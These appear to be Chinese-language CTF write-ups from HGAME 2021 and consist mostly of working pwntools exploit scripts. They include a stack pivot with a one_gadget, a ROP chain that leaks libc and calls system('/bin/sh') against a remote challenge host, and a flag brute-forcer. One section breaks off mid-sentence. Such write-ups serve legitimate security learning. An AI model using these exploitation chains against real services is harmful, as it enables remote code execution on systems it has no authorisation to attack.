HGAME2021-WEEK3-PWN-WP
blackgive
栈迁移
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
sh = process("./blackgive")
#sh = remote("")
libc = ELF("./libc6_2.27-3ubuntu1.4_amd64.so")
elf = ELF("./blackgive")
pop_rdi_ret = 0x400813
bss_base = 0x6010A0
off = 0xA0
payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(bss_base + off - 0x8) + p64(0x4007A3)
sh.recvuntil("password:")
#gdb.attach(proc.pidof(sh)[0])
sh.send(payload)
payload = '\x00' * off + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(0x40070a)
sh.sendlineafter("!\n",payload)
puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc_base = puts_addr - libc.sym['puts']
payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(0) + p64(libc_base + 0x4f432)
sh.sendafter("password:",payload)
sh.interactive()
without_leak
64 位 ret2dl-resolve 裸题。由于输出流都被关闭,所以无法实现 leak,考虑进行 ret2dl-resolve。由于提供了 libc,考虑通过伪造 link_map 结构体 getshell。打本地的时候,即便打通了也会有
HGAME-WEEK2-WP
RE
fake_debugger beta
没搞懂,不同位置的不同字符对应的编码都不同,没什么思路,写了个脚本爆破了
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
total_char = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_=+|/?.>,<:;\"\'\\`~!@#$%^&*(){}[]'
def test(flag_now):
sh = remote("101.132.177.131",9999)
payload = flag_now
sh.sendlineafter("now!\n",payload)
for i in range(2 * len(flag_now)):
sh.sendlineafter("---\n",' ')
sh.recvuntil('eax: ')
code = int(sh.recvuntil("\n"))
sh.close()
return code
def get_next(flag_now):
sh = remote("101.132.177.131",9999)
payload = flag_now + 'a'
sh.sendlineafter("now!\n",payload)
for i in range(2 * len(flag_now) + 2):
sh.sendlineafter("---\n",' ')
sh.recvuntil('ebx: ')
code = int(sh.recvuntil("\n"))
return code
flag = 'hgame{You_Kn0w_debuG'
while(flag[-1] != '}'):
mapping = {}
for charac in total_char:
mapping[test(flag + charac)] = charac
#print(str(test(charac)) + ':' + charac + '=>' + mapping[test(charac)])
flag += mapping[get_next(flag)]
print flag
print flag
分了几次爆破,所以这个脚本的起点就几乎是 flag 了
HGAME2021-WEEK2-PWN-WP
rop_primary
没什么难度,就是单纯的 ROP
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
import re
elf = ELF("./rop_primary")
pop_rdi_ret = 0x401613
pop_rsi_r15_ret = 0x401611
pop_r14_r15_ret = 0x401610
def matrixMul(A, B):
if len(A[0]) == len(B):
res = [[0] * len(B[0]) for i in range(len(A))]
for i in range(len(A)):
for j in range(len(B[0])):
for k in range(len(B)):
res[i][j] += int(A[i][k]) * int(B[k][j])
return res
sh = remote("159.75.104.107",30372)
sh.recvuntil("A:\n")
matA = []
matB = []
while 1:
number_string = sh.recvuntil("\n",drop = True)
if(number_string == 'B:'):
break
matA.append(re.findall(r"\d+\.?\d*",number_string))
while 1:
number_string = sh.recvuntil("\n",drop = True)
if(number_string == 'a * b = ?'):
break
matB.append(re.findall(r"\d+\.?\d*",number_string))
matAns = matrixMul(matA,matB)
print matAns
for i in matAns:
for j in i:
sh.sendline(str(j))
sh.recvuntil("best\n")
payload = 'a' * 0x30 + 'b' * 8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.symbols["puts"]) + p64(0x40157B)
sh.sendline(payload)
leak_addr = u64(sh.recv(6).ljust(8,'\x00'))
log.success("addr:" + hex(leak_addr))
libc = LibcSearcher('puts',leak_addr)
libc_base = leak_addr - libc.dump("puts")
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.dump("system")
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
payload = 'a' * 0x30 + 'b' * 8 + p64(pop_r14_r15_ret) + p64(0) * 2
payload += p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
sh.sendlineafter('best\n',payload)
sh.interactive()
写完exp打远程的时候发现搜不出来 libc,考虑是 libc-database 版本过低,然后尝试更新,但是 libc-database 本身是装 LibcSearcher 的时候一起装的,可能安装的时候有点问题,get 脚本用不来,所以只好整个 libc-database 删掉重装,重新 get,家里的带宽确实比较小,整个更新大概花了半个多小时,再加上更新的时候干别的事情去了差点把这题忘了,所以很晚才打通,但是运气还算不错,抢到了一血,只比二血早了30秒
…